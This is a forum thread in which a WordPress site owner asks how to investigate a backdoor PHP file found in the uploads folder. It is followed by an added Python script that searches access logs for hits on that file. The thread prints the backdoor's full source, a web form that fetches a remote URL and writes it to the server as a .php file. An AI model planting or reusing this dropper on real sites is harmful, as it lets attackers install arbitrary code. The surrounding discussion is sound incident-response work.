How to investigate when a backdoor was used and what it did?

I just installed ImunifyAV and it found a backdoor PHP file at wp-content/uploads/2021/files.php - Wordfence, ClamAV and Maldet all missed it.

Here’s the content of the file - seems to open a page and let them enter a URL and filename and then execute it.

<html>
<?php
error_reporting(0);
echo $_SERVER['DOCUMENT_ROOT'];
?>
<?php
set_time_limit(0);
error_reporting(0);
echo $_SERVER['PHP_SELF'];
?>
<form method="post">

U:<input name="url" size="50" /><br>
Y:<input name="yol" size="50" /><br>
start dont:/  file end .php
<input name="submit" type="submit" />
</form>
<?php
set_time_limit(0);
error_reporting(0);
$ext = 'php';
    // maximum execution time in seconds
    set_time_limit (24 * 60 * 60);

    if (!isset($_POST['submit'])) die();

    // folder to save downloaded files to. must end with slash
    $yol = $_POST['yol'];
    $destination_folder = '$yol';

    $url = $_POST['url'];
    $newfname = $yol . basename($url). '.' . $ext;

    $file = fopen ($url, "rb");
    if ($file) {
      $newf = fopen ($newfname, "wb");

      if ($newf)
      while(!feof($file)) {
        fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
      }
    }

    if ($file) {
      fclose($file);
    }

    if ($newf) {
      fclose($newf);
    }
?>
</html> 

Is there a particular server log that I can browse to see how many times it was accessed, and perhaps trace what might have been done with it?

I am wondering how the PHP code was even uploaded in that path when ModSecurity is installed (I believe so). Are you by any chance using any nulled/cracked themes or plugins in this particular WordPress install?

In the access log you might see some related entries.

No idea how it happened, or when it happened. I did a backup restore with the CyberPanel mechanism and it is just showing the date that that happened rather than the initial file creation date.

I’m not using anything cracked either.

I can’t see anything in the access log.

Anyway it doesn’t matter too much because my site is in development and full of dummy data. And it is another reason to look deeper into security stuff.
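An added example, not part of the original thread: one way to act on the access-log suggestion above is to pull every request to the flagged path, count hits per client, and line up successful POSTs (form submissions) with files written shortly afterwards. The combined log format, the sample log lines, the file names and the 60-second window are assumptions constructed for illustration.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

BACKDOOR = "/wp-content/uploads/2021/files.php"  # path flagged in the post
# Apache/LiteSpeed "combined" log format is assumed; check the vhost config.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')

def backdoor_hits(lines, path=BACKDOOR):
    """Parse log lines and keep requests whose URI path is the backdoor."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if m and m["uri"].split("?", 1)[0] == path:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            hits.append({"ip": m["ip"], "ts": ts, "method": m["method"],
                         "status": int(m["status"])})
    return hits

def summarize(hits):
    """Totals per client plus the POSTs, i.e. submissions of the form."""
    posts = [h for h in hits if h["method"] == "POST" and h["status"] == 200]
    return {"total": len(hits), "by_ip": Counter(h["ip"] for h in hits),
            "first": min((h["ts"] for h in hits), default=None),
            "last": max((h["ts"] for h in hits), default=None),
            "posts": posts}

def files_near(posts, files, window=timedelta(seconds=60)):
    """Paths from (path, mtime) pairs written within `window` after a POST."""
    return sorted({p for p, mt in files for h in posts
                   if timedelta(0) <= mt - h["ts"] <= window})

# Constructed sample data (documentation IPs, made-up file names).
P = BACKDOOR
SAMPLE_LOG = [
    f'203.0.113.7 - - [02/Mar/2021:10:15:01 +0000] "GET {P} HTTP/1.1" 200 412',
    f'203.0.113.7 - - [02/Mar/2021:10:15:30 +0000] "POST {P} HTTP/1.1" 200 398',
    '198.51.100.4 - - [02/Mar/2021:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 9',
    f'198.51.100.9 - - [03/Mar/2021:08:00:00 +0000] "POST {P} HTTP/1.1" 403 199',
]
SAMPLE_FILES = [  # in practice: os.walk() + os.stat().st_mtime as UTC datetimes
    ("wp-content/uploads/2021/a.txt.php",
     datetime(2021, 3, 2, 10, 15, 32, tzinfo=timezone.utc)),
    ("wp-config.php", datetime(2021, 1, 5, 9, 0, 0, tzinfo=timezone.utc)),
]
if __name__ == "__main__":
    s = summarize(backdoor_hits(SAMPLE_LOG))
    print(s["total"], dict(s["by_ip"]), files_near(s["posts"], SAMPLE_FILES))
```

Access logs normally do not record POST bodies, so the submitted url and yol values cannot be recovered from them; timing against file modification times is the remaining link. After a restore that resets file dates, as described in the thread, that correlation only works on a copy that still carries the original timestamps.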